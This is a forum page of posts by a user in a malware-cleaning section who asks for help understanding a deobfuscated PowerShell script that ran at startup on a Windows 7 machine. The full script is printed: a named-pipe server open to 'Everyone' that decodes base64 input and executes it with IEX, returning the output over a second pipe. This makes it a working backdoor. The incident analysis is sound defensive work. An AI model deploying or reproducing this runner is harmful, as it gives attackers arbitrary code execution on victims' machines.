Jump to content

NotAdmin

Members
 View Profile  See their activity

  • Posts

    4

  • Joined

  • Last visited

 Content Type 

Posts posted by NotAdmin

    Powershell code analysis - is this stuff safe?

    in Malware Finding and Cleaning

    Posted

    Apologize me if i was not clear, I try to explain better the point. 

    I received an alert of suspicious Powershell execution at a certain time and related obfuscated command was retrieved by the antimalware (in other words, i know what was executed, but i've to understand why). So, after analysis i saw that Powershell was triggered by cmd.exe but no other parent processes were found because this happened at system startup and i do not have other elements to continue the investigation (i'm thinking that something in autoexec has been compromised). 

    In the meantime, i tried to deobfuscate the Powershell script (base64 encoded) and i finally managed the attached commands. 

    At the moment i know what, when, who, where, how... I need to understand why! :)  

    Powershell code analysis - is this stuff safe?

    in Malware Finding and Cleaning

    Posted

    Hi itman, 

    I tried to locate the script but Powershell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found. 

    This process (cmd.exe, that execute powershell.exe) was triggered 5-6 times at system startup, without any particular "pattern" (it seems a random process): just to say, powershell execution detected on Monday, and then another event 4 day later, another after 7, and so on. 

    The event viewer didn't record any particular event in these specific timeframes. 

    N.B.: the powershell script was obfuscated, i decoded it and what i pasted it's the clear text command. 

    Many many thanks! 

     

    Powershell code analysis - is this stuff safe?

    in Malware Finding and Cleaning

    Posted

    Hi all,

     

    i've detected an attempt to execute Powershell command on a machine and after have decoding it, i retrieved these commands:

     

    $pn = "awkywlhbod"

    $pm = "xnopgdzmw6"

    $sb =

    {

    param ($pn, $pm)

    add-Type -assembly "System.Core"

    $ps = New-Object System.IO.Pipes.PipeSecurity

    $ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )

    $ps.AddAccessRule($ar)

    $p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)

    $p.WaitForConnection();

    $pr = new-object System.IO.StreamReader($p)

    $o = $pr.ReadLine()

    $p.Dispose();

    $pr.Dispose();

    $s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string

    $o = IEX $s |out-string

    $ps = New-Object System.IO.Pipes.PipeSecurity

    $ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )

    $ps.AddAccessRule($ar)

    $p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)

    $p.WaitForConnection();

    $pw = new-object System.IO.StreamWriter($p)

    $pw.AutoFlush = $true

    $pw.WriteLine($o);

    $p.Dispose();

    }

    add-Type -assembly "System.Core"

    $t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)

    $pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn);

    $pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm);

    Start-Sleep 600

    $t.StopJob()

     

    Is there anyone who can help me to understand what this stand for?

    Thank you very much in advance!!

×
×
  • Create New...